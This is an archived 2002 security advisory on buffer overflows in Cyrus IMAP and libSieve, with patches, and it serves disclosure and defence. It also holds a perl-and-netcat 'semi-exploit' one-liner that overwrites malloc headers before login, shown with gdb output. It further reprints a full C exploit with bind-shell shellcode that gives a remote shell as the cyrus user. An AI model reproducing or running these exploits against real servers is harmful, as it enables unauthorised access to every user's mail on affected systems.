COMMAND

	Cyrus Sieve / libSieve / IMAP buffer overflow

SYSTEMS AFFECTED

	Versions up to libSieve 2.1.2 and Cyrus IMAP 2.1.10 are affected.

PROBLEM

	In Timo Sirainen [tss@iki.fi] advisories :
	
	
	 Sieve
	 =====
	
	Cyrus' Sieve implementation contains a couple of  classic  string  based
	buffer overflows in script parsing code. Anyone who  can  execute  Sieve
	scripts can exploit these bugs. Versions up to libSieve 2.1.2 and  Cyrus
	IMAP 2.1.10 are affected.
	
	Note  that  with  Cyrus  IMAP  server  exploiting  this  gives  you  the
	privileges of Cyrus user, capable of reading all users mails.
	
	Problem comes when giving the script a >100 chars long corrupted  header
	name, >100 chars long IMAP flag  or  a  script  that  contains  lots  of
	errors to overflow the 500 char limit in error message.
	
	
	 IMAP
	 ====
	
	Cyrus  IMAP  server  has  a  a  remotely  exploitable  pre-login  buffer
	overflow. I checked versions 1.4 (oldest in web page) and  2.1.10  which
	both had it, so apparently all versions are affected.
	
	Problem is that literal lengths aren't verified to be in any  reasonable
	range. The length + 2 is then malloc()ed  and  later  written  into.  So
	given length of 2^32-1, we get  malloc(1)  call  but  ability  to  write
	2^32-1 bytes there.
	
	Note that you don't have to log in before  exploiting  this,  and  since
	Cyrus runs everything under one UID, it's possible to read every  user's
	mail in the system.
	
	I verified that this is exploitable with GLIBC 2.3.1. Probably  possible
	with older glibcs as well although they had somewhat different  malloc()
	code. No idea about other libcs, BSD ones look safe. There could  be  of
	course other ways to exploit it than just malloc headers.
	
	(BTW. Why is it that glibc's malloc implementation is almost begging  to
	be exploited? I don't think it would be that difficult to  create  safer
	implementation  with  internal  structures  in  separate  memory  pages,
	possibly even separated with non-writable page(s)  between.  Could  even
	be faster because of better CPU cache utilization,  and  maybe  made  to
	take less memory.)
	
	There's  several  other  malloc/integer  related  problems  where   it's
	possible to read over 2GB strings from clients into memory accessing  it
	with signed integers, finally wrapping into -2^31. That's  probably  not
	too bad since it can work only with  >2GB  process  limits  (only  64bit
	architectures I'd think) and even then  it  would  quite  likely  access
	only unmapped memory.
	
	Authors were first contacted 30. October, I think it's way past the  fix
	time.
	 
	 semi-exploit
	 ------------
	
	perl -e 'print "x login {4294967295}\r\n\xf0\xef\xff\xbf\x90\xef\xff\xbf\xfc\xff\xff\xff\xfc\xff\xff\xff";'|nc localhost imap2
	<ctrl-c>
	
	The first 4 bytes specify the address where you  want  to  write  to  in
	memory and the next 4 bytes is the data to be written there (must  be  a
	readable memory address). Rest of the bytes  are  overwriting  prev_size
	and size in malloc header. The above values work  with  cyrus21  package
	in Debian unstable/x86. gdb verifies that the call was successful:
	
	Program received signal SIGSEGV, Segmentation fault.
	0xbfffef90 in ?? ()
	(gdb) bt
	#0  0xbfffef90 in ?? ()
	#1  0x400233e9 in prop_dispose () from /usr/lib/libsasl2.so.2
	#2  0x4002ae1a in sasl_setpass () from /usr/lib/libsasl2.so.2
	#3  0x40026cd2 in sasl_dispose () from /usr/lib/libsasl2.so.2
	
	Shouldn't be too hard to come up with a real exploit from there on.
	
	You also need to make one "x logout\n" connection first to  trigger  the
	exploit (Cyrus reuses the processes).
	
	 Update (24 December 2002)
	 ======
	
	From http://packetstorm.decepticons.org archives :
	
	/*  cyrus-imap  exploit . gives uid cyrus					 */
	/*  tested on slack linux 8.0: cyrus-imap 2.1.10 , glibc-2.2.3 ,kernel 2.4.19	 */
	/*  irian@antisocial.com							 */
	/*										 */
	/*  please don't distro . i don't want this crap on any website.		 */
	/*  this is PoC state. it will get better.					 */
	
	#include <stdio.h>
	#include <netdb.h>
	#include <stdlib.h>
	
	char shellcode[]=
	 "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\x52\x50\xcd\x80\x43"
	 "\x66\x53\x89\xe1\x6a\x10\x51\x50\x89\xe1\x52\x50\xb0\x66\xcd\x80\x89\xe1\xb3\x04"
	 "\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x89\xd9\x93\xb0\x3f\xcd\x80\x49\x79\xf9\x52"
	 "\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
	
	struct sockaddr_in sck;
	struct hostent *hp;
	long inet;
	int sock;
	char *target[128];
	
	int  openconn(char *target,int port){
	
	  sock = socket (PF_INET, SOCK_STREAM, 0);
	
	  if (!sock)
	    {
	      perror ("socket()");
	      return 0 ;
	    }
	
	  inet = inet_addr (target);
	  if (inet == -1)
	    {
	      if (hp = gethostbyname (target))
		memcpy (&inet, hp->h_addr, 4);
	      else
		inet = -1;
	      if (inet == -1)
		{
		  fprintf (stderr, "can't resolve %s  \n", target);
		  return 0 ;
		}
	    }
	  sck.sin_family = PF_INET;
	  sck.sin_port = htons (port);
	  sck.sin_addr.s_addr = inet;
	
	  if (connect (sock, (struct sockaddr *) &sck, sizeof (sck)) < 0)
	    {
	      perror ("connect() ");
	      return 0;
	    }
	return 1 ;
	
	}
	
	main(int argc,char *argv []){
	
	int port=143;
	char sploit[512];
	char instr[]="x login {4294967295}\r\n"; //2^32
	char readbuf[512];
	
	    memset(sploit,0,sizeof(sploit));
	    memset(readbuf,0,sizeof(readbuf));
	
	    strcpy(sploit,instr);
	    strcat(sploit,"\x04\xf4\x11\x08\x04\xf4\x11\x08"); // fake chunks
	    strcat(sploit,"\xf0\xff\xff\xff\xfc\xff\xff\xff");
	    strcat(sploit,"\x04\xf5\x11\x08\x04\xf5\x11\x08");
	    strcat(sploit,"\xf0\xff\xff\xff\xfc\xff\xff\xff");
	    strcat(sploit,"\x50\xb9\x10\x08\x48\xf6\x11\x08"); // feed it to unlink() macro
			    //^retloc-12    ^shellcode addy    
	    strcat(sploit,"\xeb\x0c\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90");
	    strcat(sploit,shellcode);
	    fprintf(stderr,"%d bytes\n",strlen(sploit));
	    if (!openconn("127.0.0.1",port)) exit(-1);
	    fprintf(stderr,"connected. press a key to send the stuff...\n");
	    getchar();
	    write(sock,sploit,strlen(sploit));
	    read(sock,readbuf,511);
	    fprintf(stderr,"%s",readbuf);
	    close(sock);
	    fprintf(stderr,"exploit done. now connect to port 26112\n");
	}
	

SOLUTION

	 fix (unofficial ??)
	 ---
	
	Apply the included patch. Note that this changes only  the  yacc  files,
	you still need to generate .c  files  from  them.  libSieve  2.1.3  will
	hopefully also contain some  more  hardening  against  potential  buffer
	overflows.
	
	diff -ru cyrus-imapd-2.1.10-old/sieve/addr.y cyrus-imapd-2.1.10/sieve/addr.y
	--- cyrus-imapd-2.1.10-old/sieve/addr.y	2002-10-28 18:30:18.000000000 +0200
	+++ cyrus-imapd-2.1.10/sieve/addr.y	2002-12-02 04:52:58.000000000 +0200
	@@ -82,8 +82,9 @@
	 /* copy address error message into buffer provided by sieve parser */
	 int yyerror(char *s)
	 {
	-extern char addrerr[];
	+extern char addrerr[512];
	 
	-    strcpy(addrerr, s);
	+    strncpy(addrerr, s, sizeof(addrerr)-1);
	+    addrerr[sizeof(addrerr)-1] = '\0';
	     return 0;
	 }
	diff -ru cyrus-imapd-2.1.10-old/sieve/sieve.y cyrus-imapd-2.1.10/sieve/sieve.y
	--- cyrus-imapd-2.1.10-old/sieve/sieve.y	2002-05-14 19:51:50.000000000 +0300
	+++ cyrus-imapd-2.1.10/sieve/sieve.y	2002-12-02 03:57:17.000000000 +0200
	@@ -810,7 +810,7 @@
	     addrptr = s;
	     addrerr[0] = '\0';	/* paranoia */
	     if (addrparse()) {
	-	sprintf(errbuf, "address '%s': %s", s, addrerr);
	+	snprintf(errbuf, sizeof(errbuf), "address '%s': %s", s, addrerr);
	 	yyerror(errbuf);
	 	return 0;
	     }
	@@ -835,7 +835,7 @@
	 	   ;  controls, SP, and
	 	   ;  ":". */
	 	if (!((*h >= 33 && *h <= 57) || (*h >= 59 && *h <= 126))) {
	-	    sprintf(errbuf, "header '%s': not a valid header", hdr);
	+	    snprintf(errbuf, sizeof(errbuf), "header '%s': not a valid header", hdr);
	 	    yyerror(errbuf);
	 	    return 0;
	 	}
	@@ -853,14 +853,14 @@
	 	if (strcmp(f, "\\seen") && strcmp(f, "\\answered") &&
	 	    strcmp(f, "\\flagged") && strcmp(f, "\\draft") &&
	 	    strcmp(f, "\\deleted")) {
	-	    sprintf(errbuf, "flag '%s': not a system flag", f);
	+	    snprintf(errbuf, sizeof(errbuf), "flag '%s': not a system flag", f);
	 	    yyerror(errbuf);
	 	    return 0;
	 	}
	 	return 1;
	     }
	     if (!imparse_isatom(f)) {
	-	sprintf(errbuf, "flag '%s': not a valid keyword", f);
	+	snprintf(errbuf, sizeof(errbuf), "flag '%s': not a valid keyword", f);
	 	yyerror(errbuf);
	 	return 0;
	     }
	
	
	
	diff -ru cyrus-imapd-2.1.10-old/imap/imapparse.c cyrus-imapd-2.1.10/imap/imapparse.c
	--- cyrus-imapd-2.1.10-old/imap/imapparse.c	2002-06-24 21:58:41.000000000 +0300
	+++ cyrus-imapd-2.1.10/imap/imapparse.c	2002-11-29 00:20:44.000000000 +0200
	@@ -97,7 +97,7 @@
	 	       struct buf *buf, int type)
	 {
	     int c;
	-    int i;
	+    unsigned int i;
	     unsigned int len = 0;
	     int sawdigit = 0;
	     int isnowait;
	@@ -228,6 +228,16 @@
	 	    if (c != EOF) prot_ungetc(c, pin);
	 	    return EOF;
	 	}
	+	if (len > 65536) {
	+	    if (isnowait) {
	+	        for (i = 0; i < len; i++)
	+	            c = prot_getc(pin);
	+	    }
	+	    prot_printf(pout, "* BAD Literal too large\r\n");
	+	    prot_flush(pout);
	+	    if (c != EOF) prot_ungetc(c, pin);
	+	    return EOF;
	+	}
	 	if (len >= buf->alloc) {
	 	    buf->alloc = len+1;
	 	    buf->s = xrealloc(buf->s, buf->alloc+1);